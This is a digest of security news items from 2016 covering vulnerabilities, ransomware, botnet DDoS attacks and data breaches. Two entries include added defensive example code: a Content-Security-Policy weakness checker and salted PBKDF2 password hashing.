Security Alerts & News
by Tymoteusz A. Góral

History
#1529 Cisco warns of critical flaw in email security appliances
Cisco Systems released a critical security bulletin for a vulnerability that allows remote unauthenticated users to gain complete control of its email security appliances. The vulnerability is tied to Cisco’s IronPort AsyncOS operating system.

Cisco first issued a security bulletin last week for the IronPort AsyncOS, but on Wednesday updated that alert with more information including a software update that addresses the security flaw. Cisco also indicated a workaround exists that can halt remote access to affected email appliances.

Cisco says the vulnerability (CVE-2016-6406) is tied to the presence of the company’s own internal testing and debugging interface, accessible on the IronPort AsyncOS operating system. “An attacker could exploit this vulnerability by connecting to this testing and debugging interface. An exploit could allow an attacker to obtain complete control of an affected device with root-level privileges,” Cisco explains.
#1528 The psychological reasons behind risky password practices
Despite high-profile, large-scale data breaches dominating the news cycle – and repeated recommendations from experts to use strong passwords – consumers have yet to adjust their own behavior when it comes to password reuse.

A Lab42 survey, which polled consumers across the United States, Germany, France, New Zealand, Australia and the United Kingdom, highlights the psychology around why consumers develop poor password habits despite understanding the obvious risk, and suggests that there is a level of cognitive dissonance around our online habits.
#1527 Backdoored DLink router should be trashed, researcher says
A researcher who found a slew of vulnerabilities in a popular router said it’s so hopelessly broken that consumers who own them should throw them away.

Pierre Kim said attackers could easily exploit the vulnerabilities and use the device as a spamming zombie or a man-in-the-middle tool. “I advise users to trash their routers because it’s trivial for an attacker to use this router as an attack vector,” Kim said.
#1526 ‘Money Mule’ gangs turn to Bitcoin ATMs
Fraudsters who hack corporate bank accounts typically launder stolen funds by making deposits from the hacked company into accounts owned by “money mules,” willing or unwitting dupes recruited through work-at-home job scams. The mules usually are then asked to withdraw the funds in cash and wire the money to the scammers. Increasingly, however, the mules are being instructed to remit the stolen money via Bitcoin ATMs.
#1525 Data breach statistics 2016: First half results are in
So far, 2016 hasn’t been great in terms of data breach statistics. Based on newly released findings from the Breach Level Index (BLI), there were 974 publicly disclosed data breaches in the first half of 2016, which led to the successful theft or loss of 554 million data records.
#1524 Meet Apache Spot, a new open source project for cybersecurity
Hard on the heels of the discovery of the largest known data breach in history, Cloudera and Intel on Wednesday announced that they've donated a new open source project to the Apache Software Foundation with a focus on using big data analytics and machine learning for cybersecurity.

Originally created by Intel and launched as the Open Network Insight (ONI) project in February, the effort is now called Apache Spot and has been accepted into the ASF Incubator.

"The idea is, let's create a common data model that any application developer can take advantage of to bring new analytic capabilities to bear on cybersecurity problems," Mike Olson, Cloudera co-founder and chief strategy officer, told an audience at the Strata+Hadoop World show in New York. "This is a big deal, and could have a huge impact around the world."
#1523 Mamba ransomware strikes at your whole disk, not just your files
Mamba takes the approach of ransoming your whole disk one step further: it scrambles every disk sector, including the MFT, the operating system, your apps, any shared files and all your personal data, too.

Ironically, Mamba does all of this with very little programming effort: the malware simply installs and activates a pirated copy of the open source software DiskCryptor.
#1522 Google tackles XSS scripting flaws with new developer tools
Google has released two new tools for developers looking to protect web domains against XSS scripting security flaws.

Cross-site scripting (XSS) is a common security issue web developers face today. The attack, which relies on vulnerabilities that allow the injection of malicious code into trusted websites and applications, can lead to malvertising campaigns, watering hole attacks, and drive-by attacks that require nothing more of victims visiting a trusted site than opening a page.

Content Security Policy (CSP) is often the answer for web developers who want to stay clear of such attacks. CSP, supported by all major browsers, can be used to restrict which scripts a page is allowed to load and execute, so that injected code is blocked from running even when attackers manage to insert it into a vulnerable web page.
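As an added illustration of the point above (example code written for this digest, not one of Google's tools and not code from the article), the snippet below parses a Content-Security-Policy header, reports the sources that would still let injected scripts run, and builds a nonce-based policy of the kind that defeats reflected and stored XSS. The directive set in `build_script_policy` and the list of flagged sources are this example's own choices; the sample headers are constructed.

```python
import secrets
from typing import Dict, List, Optional

# Source expressions that bind script execution to a per-response secret or a
# content hash; when one is present, browsers that understand CSP2 ignore
# 'unsafe-inline', so it is no longer a weakness.
NONCE_OR_HASH_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a CSP header into {directive: [source, ...]}.

    Directive names are case-insensitive and, as in browsers, the first
    occurrence of a directive wins; later duplicates are ignored.
    """
    policy: Dict[str, List[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        if name not in policy:
            policy[name] = tokens[1:]
    return policy


def script_sources(policy: Dict[str, List[str]]) -> Optional[List[str]]:
    """Sources governing <script>: script-src, else the default-src fallback."""
    if "script-src" in policy:
        return policy["script-src"]
    return policy.get("default-src")


def policy_weaknesses(header: str) -> List[str]:
    """Return human-readable findings for a header; an empty list means the
    policy does not obviously permit attacker-injected scripts."""
    sources = script_sources(parse_csp(header))
    if sources is None:
        return ["no script-src or default-src: injected scripts are not restricted"]
    findings: List[str] = []
    has_nonce_or_hash = any(s.startswith(NONCE_OR_HASH_PREFIXES) for s in sources)
    for src in sources:
        if src == "'unsafe-inline'" and not has_nonce_or_hash:
            findings.append("'unsafe-inline' lets injected inline scripts run")
        elif src == "'unsafe-eval'":
            findings.append("'unsafe-eval' lets injected strings be executed via eval()")
        elif src in ("*", "http:", "https:", "data:"):
            findings.append(f"{src} allows scripts from any origin of that kind")
    return findings


def new_nonce() -> str:
    """Fresh, unguessable nonce; generate one per HTTP response."""
    return secrets.token_urlsafe(16)


def build_script_policy(nonce: str) -> str:
    """Nonce-based policy: only <script nonce="..."> tags emitted by the server
    run, and scripts they load are trusted transitively via 'strict-dynamic'."""
    return (
        f"default-src 'self'; "
        f"script-src 'nonce-{nonce}' 'strict-dynamic'; "
        "object-src 'none'; base-uri 'none'"
    )


if __name__ == "__main__":
    # Constructed sample: a typical allow-list policy that still permits XSS.
    weak = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example.com"
    for finding in policy_weaknesses(weak):
        print("weak:", finding)
    strong = build_script_policy(new_nonce())
    print("strong policy:", strong, "->", policy_weaknesses(strong) or "no findings")
```

The checker deliberately looks only at the directive that governs scripts (with the `default-src` fallback), because that is the one that decides whether an injected `<script>` executes; a policy that lists many image or font origins but leaves `script-src` open still does nothing against XSS.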
#1521 Record-breaking DDoS reportedly delivered by >145k hacked cameras
Last week, security news site KrebsOnSecurity went dark for more than 24 hours following what was believed to be a record 620 gigabit-per-second denial of service attack brought on by an ensemble of routers, security cameras, or other so-called Internet of Things devices. Now, there's word of a similar attack on a French Web host that peaked at a staggering 1.1 terabits per second, more than 60 percent bigger.

The attacks were first reported on September 19 by Octave Klaba, the founder and CTO of OVH. The first one reached 1.1 Tbps while a follow-on was 901 Gbps. Then, last Friday, he reported more attacks that were in the same almost incomprehensible range. He said the distributed denial-of-service (DDoS) attacks were delivered through a collection of hacked Internet-connected cameras and digital video recorders. With each one having the ability to bombard targets with 1 Mbps to 30 Mbps, he estimated the botnet had a capacity of 1.5 Tbps.

On Monday, Klaba reported that more than 6,800 new cameras had joined the botnet and said further that over the previous 48 hours the hosting service was subjected to dozens of attacks, some ranging from 100 Gbps to 800 Gbps. On Wednesday, he said more than 15,000 new devices had participated in attacks over the past 48 hours.
#1520 Europol warns of Android tap-and-go thefts
Law authorities have warned they believe criminals are using Android phones to trigger fraudulent tap-and-go payments.

The alert comes in Europol's annual Internet Organised Crime Threat Assessment report.

Experts had previously said that the rollout of smart wallet systems could raise such a threat.

However, the police are unsure exactly how the attacks are being carried out and how common they are.

"The possibility of compromising NFC [near field communication] transactions was explored by academia years ago, and it appears that fraudsters have finally made progress in the area," the report says.
#1519 IEEE sets new Ethernet standard that brings 5X the speed without disruptive cable changes
As expected, the IEEE has ratified a new Ethernet specification, IEEE P802.3bz, that defines 2.5GBASE-T and 5GBASE-T, boosting the current top speed of traditional Ethernet fivefold without requiring current cabling to be torn out.

The Ethernet Alliance wrote that the IEEE 802.3bz Standard for Ethernet Amendment, which sets Media Access Control Parameters, Physical Layers and Management Parameters for 2.5G and 5Gbps Operation, lets access layer bandwidth evolve incrementally beyond 1Gbps, and that it will help address emerging needs in a variety of settings and applications, including enterprise and wireless networks.
#1518 Android.Lockscreen ransomware now using pseudorandom numbers
New variants of Android.Lockscreen are using pseudorandom passcodes to prevent victims from unlocking devices without paying the ransom. Previous versions of these threats locked the screen and used a hardcoded passcode, but analysts were able to reverse engineer the code to provide victims with the passcode to unlock their devices. Attackers have also combined a custom lockscreen with the device's lockscreen to create an additional hurdle for those infected. Similar to some other mobile threats we've observed, these Trojans are being created directly on mobile devices before being distributed. Symantec detects these threats as Android.Lockscreen.
#1517 Virlock ransomware can now use the cloud to spread, say researchers
A new variant of Virlock ransomware is capable of stealthily spreading itself through cloud storage and collaboration applications, potentially enabling one infected user to inadvertently spread the file-locking malware across their enterprise network.

The Virlock variant is yet another instance of cybercriminals deploying new techniques in order to make ransomware even more effective: it's expected to cost organisations a total of $1bn during 2016 alone.

Virlock has been active for almost two years now, and security researchers at Netskope have discovered how Virlock can employ a 'fan-out' effect, spreading itself through the use of cloud sync, cloud storage, and collaboration applications.
#1516 Kaspersky Cybersecurity Index
Cyberthreats are out there. Do people know about them? Are they being targeted? Are they protected? Take a look at this global problem with the Kaspersky Index.
#1515 Firefox ready to block certificate authority that threatened Web security
The organization that develops Firefox has recommended the browser block digital credentials issued by a China-based certificate authority for 12 months after discovering it cut corners that undermine the entire transport layer security system that encrypts and authenticates websites.

The browser-trusted WoSign authority intentionally back-dated certificates it has issued over the past nine months to avoid an industry-mandated ban on the use of the SHA-1 hashing algorithm, Mozilla officials charged in a report published Monday. SHA-1-based signatures were barred at the beginning of the year because of industry consensus they are unacceptably susceptible to cryptographic collision attacks that can create counterfeit credentials. To satisfy customers who experienced difficulty retiring the old hashing function, WoSign continued to use it anyway and concealed the use by dating certificates prior to the first of this year, Mozilla officials said. They also accused WoSign of improperly concealing its acquisition of Israeli certificate authority StartCom, which was used to issue at least one of the improperly issued certificates.

"Taking into account all the issues listed above, Mozilla's CA team has lost confidence in the ability of WoSign/StartCom to faithfully and competently discharge the functions of a CA," Monday's report stated. "Therefore we propose that, starting on a date to be determined in the near future, Mozilla products will no longer trust newly issued certificates issued by either of these two CA brands."
#1514 As we speak, teen social site is leaking millions of plaintext passwords
A social hangout website for teenage girls has sprung a leak that's exposing plaintext passwords protecting as many as 5.5 million user accounts. As this post went live, all attempts to get the leak plugged had failed.

Operators of i-Dressup didn't respond to messages sent by Ars informing them that a hacker has already downloaded more than 2.2 million of the improperly stored account credentials. The hacker said it took him about three weeks to obtain the cache and that there's nothing stopping him or others from downloading the entire database of slightly more than 5.5 million entries. The hacker said he acquired the e-mail addresses and passwords by using a SQL injection attack that exploited vulnerabilities in the i-Dressup website.
#1513 Sofacy APT targeting OSX machines with Komplex trojan
The prolific APT gang allegedly behind the DNC hack and other targeted attacks against Western military and political targets is using a new Trojan called Komplex to infect OS X machines used in the aerospace industry.

The gang, known as Sofacy, APT28, Fancy Bear, Sednit and Pawn Storm, is spreading the malware via phishing emails promising insight into the future of Russia’s space program, researchers at Palo Alto Networks said on Monday.

“Apple does a great job at defending OS X. The only thing being exploited here is the user. But it’s important to remember, people are still a target no matter what OS you use,” said Ryan Olson, intelligence director at Unit 42 of Palo Alto Networks.
#1512 How Dropbox securely stores your passwords
It’s universally acknowledged that it’s a bad idea to store plain-text passwords. If a database containing plain-text passwords is compromised, user accounts are in immediate danger. For this reason, as early as 1976, the industry standardized on storing passwords using secure, one-way hashing mechanisms (starting with Unix Crypt). Unfortunately, while this prevents the direct reading of passwords in case of a compromise, all hashing mechanisms necessarily allow attackers to brute force the hash offline, by going through lists of possible passwords, hashing them, and comparing the result. In this context, secure hashing functions like SHA have a critical flaw for password hashing: they are designed to be fast. A modern commodity CPU can generate millions of SHA-256 hashes per second. Specialized GPU clusters allow for calculating hashes at a rate of billions per second.

Over the years, we’ve quietly upgraded our password hashing approach multiple times in an ongoing effort to stay ahead of the bad guys. In this post, we want to share more details of our current password storage mechanism and our reasoning behind it. Our password storage scheme relies on three different layers of cryptographic protections, as the figure below illustrates. For ease of elucidation, in the figure and below we omit any mention of binary encoding (base64).
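The excerpt above explains why a fast hash is the wrong tool for passwords; the added example below (written for this digest, not Dropbox's code or its actual storage scheme) shows the general remedy: a per-user random salt, a deliberately slow key-derivation function, and a constant-time comparison on verification. PBKDF2-HMAC-SHA256 from the standard library stands in for the slow hash, and the iteration count and record format are this example's own assumptions, not parameters taken from the article.

```python
import hashlib
import hmac
import os
import time
from typing import Optional

# Work factor for the slow hash. PBKDF2 is used because it ships with Python;
# bcrypt, scrypt or Argon2 are the usual production choices. The iteration
# count below is an assumption for this example, not a tuned recommendation.
PBKDF2_ITERATIONS = 200_000
SALT_BYTES = 16
RECORD_ALGO = "pbkdf2_sha256"


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> str:
    """Return a self-describing record 'algo$iterations$salt_hex$hash_hex'.

    A fresh random salt per user means equal passwords yield different records
    and an attacker cannot precompute one lookup table for the whole database.
    Storing the iteration count in the record lets it be raised later without
    breaking existing accounts.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{RECORD_ALGO}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the hash with the stored salt and parameters and compare in
    constant time so the comparison leaks nothing about how many bytes matched."""
    algo, iterations, salt_hex, hash_hex = record.split("$")
    if algo != RECORD_ALGO:
        raise ValueError(f"unsupported password record format: {algo}")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(hash_hex))


def slowdown_factor(password: str, iterations: int = PBKDF2_ITERATIONS) -> float:
    """Time one guess with plain salted SHA-256 versus one PBKDF2 guess and
    return the ratio. This is the article's 'designed to be fast' point made
    measurable: an offline attacker's guess rate is divided by about this much."""
    salt = os.urandom(SALT_BYTES)
    data = password.encode("utf-8")
    samples = 1000
    t0 = time.perf_counter()
    for _ in range(samples):
        hashlib.sha256(salt + data).digest()
    fast = (time.perf_counter() - t0) / samples
    t0 = time.perf_counter()
    hashlib.pbkdf2_hmac("sha256", data, salt, iterations)
    slow = time.perf_counter() - t0
    return slow / max(fast, 1e-9)


if __name__ == "__main__":
    # Constructed sample credentials for the demonstration.
    record = hash_password("correct horse battery staple")
    print("stored record:", record)
    print("right password accepted:", verify_password("correct horse battery staple", record))
    print("wrong password rejected:", not verify_password("Tr0ub4dor&3", record))
    print(f"one PBKDF2 guess costs ~{slowdown_factor('hunter2'):.0f}x one SHA-256 guess")
```

The slowdown is the whole point: the legitimate login pays the cost once per attempt, while an attacker running a wordlist against a stolen database pays it for every candidate of every account, and the per-user salt prevents that work from being shared across accounts.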
#1511 Drupal patches multiple security flaws in core engine
Drupal has issued a security update which resolves three security flaws, two of which are deemed critical.

Earlier this week, the open-source website content management system (CMS) released a security advisory detailing the latest security issues which have been both discovered and fixed.

The three vulnerabilities, assigned as SA-CORE-2016-004, affect versions 8.x of the CMS and users are now advised to upgrade to Drupal 8.1.10.

The first bug, considered the least dangerous of the three, is a problem which allows users without admin rights to set comment visibility on nodes they have rights to edit. By default, these user accounts should not be able to make these changes.
#1510 MarsJoke ransomware mimics CTB-Locker
Ransomware in its various forms continues to make headlines as much for high-profile network disruptions as for the ubiquity of attacks among consumers. We recently noted the non-linear growth of ransomware variants and now a new type has emerged, dubbed MarsJoke.

Proofpoint researchers originally spotted the MarsJoke ransomware in late August [1] by trawling through our repository of unknown malware. However, beginning on September 22, 2016, we detected the first large-scale email campaign distributing MarsJoke. This ongoing campaign appears to target primarily state and local government agencies and educational institutions in the United States.

The targeting of state and local government agencies as well as the distribution methods are very similar to a CryptFile2 campaign we described in August [2]. Gary Warner’s blog also reported on this and similar campaigns, indicating that a well-known botnet, Kelihos, is responsible for distributing this spam.
#1509 Nearly all top global companies have leaked credentials online
Many CSOs live in fear of waking up to an email reporting a data breach at their company, but the threat to an enterprise isn’t limited to a compromise of that specific organization. A new report shows that there are leaked employee credentials online for 97 percent of the top 1,000 global companies, many of which came from third-party breaches.

The last few years have seen a number of large-scale breaches at popular sites and companies, including LinkedIn, Adobe, MySpace, and Ashley Madison, and many of the credentials stolen during those incidents have ended up online in various places. Corporate employees, like most other users, often reuse their credentials in several places. But the worrisome thing is that many of them are using their work email addresses and passwords as credentials on third-party sites.
#1508 OpenSSL patches high-severity OCSP bug, mitigates SWEET32 attack
A vulnerability in the OpenSSL implementation of the Online Certificate Status Protocol (OCSP) was patched this week, closing a denial-of-service weakness in affected servers.

The patch was the most severe of 14 released yesterday by OpenSSL.

OCSP is an alternative in many cases to Certificate Revocation Lists where a client can use the protocol to ping a server requesting the status of a digital certificate.
#1507 We're told data breaches cost millions on average - but this security study disagrees
Far from running into millions, the average cost of a data breach is less than $200,000, or roughly what firms are spending on IT security systems, according to a study from non-profit thinktank RAND.

The study, published in the Journal of Cybersecurity, challenges the much higher cost estimates provided by the Ponemon Institute. This year that research organization put the average cost of a breach at $4m.

RAND policy researcher Sasha Romanosky analyzed 12,000 events between 2004 and 2015 and found that the cost to each firm was on average less than $200,000. This figure is on a par with the 0.4 percent of revenues that firms in the study spent annually on IT security.
#1506 Cisco Talos: Spam at levels not seen since 2010
Spam is back in a big way – at levels that have not been seen since 2010, in fact. That’s according to a blog post today from Cisco Talos, whose author Jaeson Schultz stated that the increase is largely the handiwork of the Necurs botnet.

“Many of the host IPs sending Necurs' spam have been infected for more than two years. To help keep the full scope of the botnet hidden, Necurs will only send spam from a subset of its minions. An infected host might be used for two to three days, and then sometimes not again for two to three weeks. This greatly complicates the job of security personnel who respond to spam attacks, because while they may believe the offending host was subsequently found and cleaned up, the reality is that the miscreants behind Necurs are just biding their time, and suddenly the spam starts all over again. At Talos, we see this pattern over, and over again for many Necurs-affiliated IPs,” he wrote.
#1505 Vulnerable ISAKMP Scanning Project
This scan is looking for devices that contain a vulnerability in their IKEv1 packet processing code that could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.

The goal of this project is to identify the vulnerable systems and report them back to the network owners for remediation.
#1504 71 percent of Australian-used IoT devices failed privacy probe
The Office of the Australian Information Commissioner (OAIC) has found that 71 percent of Internet of Things (IoT) devices and services used by Australians failed to adequately explain how personal information was collected, used, and disclosed.

According to Australian Privacy Commissioner Timothy Pilgrim, the seamless nature of how IoT devices collect, store, and share user information means that customers are not always fully aware of the privacy risks.

"The Internet of Things allows for some great products and entertainment, but many of us have adopted this technology into our everyday lives without considering how much of our personal information is being captured or what happens to that information," he said.
#1503 From RAR to JavaScript: ransomware figures in the fluctuations of email attachments
Why is it critical to stop ransomware at the gateway layer? Because email is the top entry point used by prevalent ransomware families. Based on our analysis, 71% of known ransomware families arrive via email. While there’s nothing new about the use of spam, ransomware distributors continue to employ this infection vector because it’s a tried-and-tested method. It’s also an effective way to reach potential victims like enterprises and small and medium businesses (SMBs) that normally use emails for communication and daily operations. Over the first half of the year, we observed how cybercriminals leveraged file types like JavaScript, VBScript, and Office files with macros to evade traditional security solutions. Some of these file types can be used to code malware. In fact, as a security precaution, Microsoft turns off macros by default.

In this blog post, we examine various email file attachments and how ransomware affected the fluctuation in the use of these file types.
#1502 Cisco warns of command injection flaw in Cloud platform
It’s already been a busy month of patching for Cisco Systems, and on Wednesday the networking giant rolled out nine more security updates addressing critical vulnerabilities across its core product lines.

Most notably, Cisco is warning of two security holes (one rated critical, the other high) found in its Cisco Cloud Services Platform 2100 (CCSP). One could allow an unauthenticated remote attacker to execute arbitrary code on a targeted system. The other is a command injection vulnerability found in the web-based GUI of the CCSP. This critical vulnerability could allow a remote attacker to gain root access privileges on CCSP’s underlying OS and execute arbitrary commands.

In both CCSP cases, Cisco has released software patches to fix the vulnerabilities.
#1501 Don’t plug it in! Scammers post infected USB sticks through letterboxes
Unexpectedly received a USB stick in the post? Whatever you do … DON’T PLUG IT IN!!

Police in the Australian state of Victoria are warning the public about cybercriminals’ latest tactic: randomly dropping unmarked USB sticks containing malware through letterboxes.

The criminals are of course hoping that the unsuspecting recipients will plug the freebie USB drives into their computers.
#1500 A bite of Python
Being easy to pick up and quick to progress towards developing larger and more complicated applications, Python is becoming increasingly ubiquitous in computing environments. However, the language's apparent clarity and friendliness can lull the vigilance of software engineers and system administrators, luring them into coding mistakes that may have serious security implications. In this article, which primarily targets people who are new to Python, a handful of security-related quirks are looked at; experienced developers may well be aware of the peculiarities that follow.
#1499 More than 840,000 Cisco devices are vulnerable to NSA-related exploit
More than 840,000 Cisco networking devices from around the world are exposed to a vulnerability that's similar to one exploited by a hacking group believed to be linked to the U.S. National Security Agency.

The vulnerability was announced by Cisco last week and it affects the IOS, IOS XE, and IOS XR software that powers many of its networking devices. The flaw allows hackers to remotely extract the contents of a device's memory, which can lead to the exposure of sensitive information.

The vulnerability stems from how the OS processes IKEv1 (Internet Key Exchange version 1) requests. This key exchange protocol is used for VPNs (Virtual Private Networks) and other features that are popular in enterprise environments.
#1498 Bug that hit Firefox and Tor browsers was hard to spot—now we know why
A recently fixed security vulnerability that affected both the Firefox and Tor browsers had a highly unusual characteristic that caused it to threaten users only during temporary windows of time that could last anywhere from two days to more than a month.

As a result, the cross-platform, malicious code-execution risk most recently visited users of browsers based on the Firefox Extended Release on September 3 and lasted until Tuesday, or a total of 17 days. The same Firefox version was vulnerable for an even longer window last year, starting on July 4 and lasting until August 11. The bug was scheduled to reappear for a few days in November and for five weeks in December and January. Both the Tor Browser and the production version of Firefox were vulnerable during similarly irregular windows of time.

While the windows were open, the browsers failed to enforce a security measure known as certificate pinning when automatically installing NoScript and certain other browser extensions. That meant an attacker who had a man-in-the-middle position and a forged certificate impersonating a Mozilla server could surreptitiously install malware on a user's machine. While it can be challenging to hack a certificate authority or trick one into issuing the necessary certificate for addons.mozilla.org, such a capability is well within the means of nation-sponsored attackers, who are precisely the sort of adversaries included in the Tor threat model. Such an attack, however, was only viable at certain periods when Mozilla-supplied "pins" expired.
#1497 SWIFT confirms banks still being targeted, announces mitigation tool
SWIFT’s chief information security officer said Wednesday that the cooperative is still seeing cases where its customers’ environments have been compromised.

“The threat is persistent, adaptive and sophisticated – and it is here to stay,” Alain Desausoi, the cooperative’s CISO, said, adding that fraudulent attempts continue to be made through its network to trick banks into sending payments.

Desausoi was speaking at the Financial Times Cyber Security Summit Europe in London. In a conversation with Kara Scannell, the publication’s investigations correspondent, the CISO touched on the security of SWIFT’s customers and described a new tool, announced by the cooperative on Tuesday, aimed at strengthening its customers’ existing fraud controls and designed to mitigate future cyber threats.

The tool, called Daily Validation Reports, will give banks and other clients the ability to review a daily summary of their messages. According to a press release issued by the Brussels-based cooperative, the tool is slated for release in December and will help customers verify message activity and tip them off to any unusual patterns.
#1496 IoT devices being increasingly used for DDoS attacks
Malware targeting the Internet of Things (IoT) has come of age and the number of attack groups focusing on IoT has multiplied over the past year. 2015 was a record year for IoT attacks, with eight new malware families emerging. More than half of all IoT attacks originate from China and the US. High numbers of attacks are also emanating from Russia, Germany, the Netherlands, Ukraine and Vietnam.

Poor security on many IoT devices makes them soft targets and often victims may not even know they have been infected. Attackers are now highly aware of lax IoT security and many pre-program their malware with commonly used and default passwords.

IoT attacks have long been predicted, with plenty of speculation about possible hijacking of home automation and home security devices. However, attacks to date have taken a different shape. Attackers tend to be less interested in the victim and the majority wish to hijack a device to add it to a botnet, most of which are used to perform distributed denial of service (DDoS) attacks.
#1495 Future attack scenarios against ATM authentication systems
A lot has already been said about current cyber threats facing the owners of ATMs. The reason behind the ever-growing number of attacks on these devices is simple: the overall level of security of modern ATMs often makes them the easiest and fastest way for fraudsters to access the bank’s money. Naturally, the banking industry is reacting to these attacks by implementing a range of security measures, but the threat landscape is continually evolving. In order to prepare banks for what they should expect to see from criminals in the near future, we’ve prepared an overview report of future cyberthreats to ATMs. The report will – we hope – help the industry to better prepare for a new generation of attack tools and techniques.

The report comprises two papers in which we analyze all existing methods of authentication used in ATMs and those expected to be used in the near future, including: contactless authentication through NFC, one-time password authentication and biometric authentication systems, as well as potential vectors of attacks using malware, through to network attacks and attacks on hardware components.
#1494 Massive web attack hits security blogger
One of the biggest web attacks ever seen has been aimed at a security blogger after he exposed hackers who carry out such attacks for cash.

The distributed denial of service (DDoS) attack was aimed at the website of industry expert Brian Krebs.

At its peak, the attack aimed 620 gigabits of data a second at the site.

Text found in attack data packets suggested it was mounted to protest against Mr Krebs' work to uncover who was behind a prolific DDoS attack.

In a blogpost, Mr Krebs detailed the attack, which began late on Tuesday night and quickly ramped up to its peak attack rate.

DDoS attacks are typically carried out to knock a site offline - but Mr Krebs' site stayed online thanks to work by security engineers, who said the amount of data used was nearly twice the size of the largest attack they had ever seen.
#1493 Malware evades detection with novel technique
Researchers have found a new strain of document-based macro malware that evades discovery by lying dormant when it detects a security researcher’s test environment.

The malware, according to researcher Caleb Fenton with security firm SentinelOne, evades detection simply by counting the number of documents – or the lack thereof – that reside on a PC and not executing if a certain number are not present.

Fenton, who discovered the malware after several failed attempts to trigger the sample into acting maliciously, said the typical lack of documents in a virtual machine and sandboxed test environment make it easy, in this case, for malware authors to fly under the radar.
#1492 Yahoo is expected to confirm a massive data breach, impacting hundreds of millions of users
Yahoo is poised to confirm a massive data breach of its service, according to several sources close to the situation, hacking that has exposed several hundred million user accounts.

While sources were unspecific about the extent of the incursion, since there is the likelihood of government investigations and legal action related to the breach, they noted that it is widespread and serious.

Earlier this summer, Yahoo said it was investigating a data breach in which hackers claimed to have access to 200 million user accounts and one was selling them online. “It’s as bad as that,” said one source. “Worse, really.”

The announcement, which is expected to come this week, also has possible larger implications for the $4.8 billion sale of Yahoo’s core business — which is at the core of this hack — to Verizon. The scale of the liability could bring untold headaches to the new owners. Shareholders are likely to worry that it could lead to an adjustment in the price of the transaction.
#1491 iSpy Keylogger targets passwords, Skype, webcams
Researchers are monitoring sales and infection rates of a new keylogger being sold on the dark web for $25 to $35.

Along with capturing keystrokes, iSpy grabs passwords stored in web browsers, records Skype chats, takes webcam screenshots and steals the license keys of software such as Adobe Photoshop and Microsoft Office.

According to Zscaler ThreatLabZ, the malware is delivered via malicious JavaScript or document attachments in spam campaigns. What makes iSpy a unique keylogger, says ThreatLabZ, is the fact that versions of it are signed and use (expired) digital certificates in an attempt to maintain an appearance of legitimacy when first scanned by security software.
#1490 New malware is hitting your network every four seconds
An exponential rise in malware means employees are at the highest risk ever of accidentally installing malicious software onto the enterprise network - and it happens every four seconds within the average company, a new report has warned.

Cybersecurity researchers at Check Point analysed information on over 30,000 security events discovered by the company's ThreatCloud prevention software at more than 1,000 companies across the globe.

They found that employees in industry, finance, government and other sectors are very much taking a cavalier attitude to cybersecurity and downloading potentially harmful files to the company network.

It's unknown malware - malicious software which isn't yet recognised by security systems - which is most likely to be downloaded by employees and according to the report, it happens every four seconds on average across the organisations analysed in the report. The figure adds up to 971 unknown malware downloads per hour, representing nine times more downloads than the previous year, when the figure was 106 downloads per hour.
#1489 Malware-infected USB sticks posted to Australian homes
USB sticks containing harmful malware have been left in Australian letterboxes, police in Victoria have warned.

Residents of Pakenham, a suburb of Melbourne, have reportedly found the unmarked sticks in the boxes.

Plugging them into a computer triggers fraudulent media-streaming service offers, as well as other malware, the force said in a statement.

The devices are "extremely harmful" and should not be used, police say.
#1488 The banker that can steal anything
In the past, we’ve seen advertising applications such as Leech, Guerrilla and Ztorg exploit superuser rights. This use of root privileges is not typical, however, for banking malware attacks, because money can be stolen in numerous other ways that don’t require exclusive rights. However, in early February 2016, Kaspersky Lab discovered Trojan-Banker.AndroidOS.Tordow.a, whose creators decided that root privileges would come in handy. We had been watching the development of this malicious program closely and found that Tordow’s capabilities had significantly exceeded the functionality of most other banking malware, and this allowed cybercriminals to carry out new types of attacks.
#1487 Mamba ransomware encrypts hard drives rather than files
Just when we thought ransomware’s evolution had peaked, a new strain has been discovered that forgoes the encryption of individual files, and instead encrypts a machine’s hard drive.

The malware, called Mamba, has been found on machines in Brazil, the United States and India, according to researchers at Morphus Labs in Brazil. It was discovered by the company in response to an infection at a customer in the energy sector in Brazil with subsidiaries in the U.S. and India.

Renato Marinho, a researcher with Morphus Labs, told Threatpost that the ransomware is likely being spread via phishing emails. Once it infects a machine, it overwrites the existing Master Boot Record with a custom MBR, and from there, encrypts the hard drive.
#1486 DDoS mitigation firm has history of hijacks
Last week, KrebsOnSecurity detailed how BackConnect Inc. — a company that defends victims against large-scale distributed denial-of-service (DDoS) attacks — admitted to hijacking hundreds of Internet addresses from a European Internet service provider in order to glean information about attackers who were targeting BackConnect. According to an exhaustive analysis of historic Internet records, BackConnect appears to have a history of such “hacking back” activity.

On Sept. 8, 2016, KrebsOnSecurity exposed the inner workings of vDOS, a DDoS-for-hire or “booter” service whose tens of thousands of paying customers used the service to launch attacks against hundreds of thousands of targets over the service’s four-year history in business.
#1485 Data-stealing Qadars Trojan malware takes aim at 18 UK banks
A three-year-old banking Trojan, believed to be the work of experienced and organised Russian cybercriminals, has now turned its attention to UK banks.

The Qadars Trojan has been active since 2013. Using several different versions, the malware has targeted banks in different regions, beginning with France and the Netherlands during 2013 and 2014, then Australia, Canada, the United States, and the Netherlands during 2015 and 2016.

Now, cybersecurity researchers at IBM X-Force Research -- who last month spotted malware attacking Brazilian banks ahead of the Olympics -- have observed the launch of a fresh version of Qadars and a new infection campaign.
#1484 Vulnerability patched in WordPress theme that allows unrestricted uploads
WordPress theme publisher DynamicPress fixed a flaw Monday that let anyone upload malicious files to sites running its business-themed Neosense WordPress templates, compromise the site and possibly the server hosting it.

Walter Hop, security researcher with Netherlands-based company, Slik, made the discovery last week. The flaw impacts version 1.7 of the Neosense theme. On Monday, DynamicPress released a 1.8 version update that patches the vulnerability. Hop publicly disclosed the vulnerability Monday.
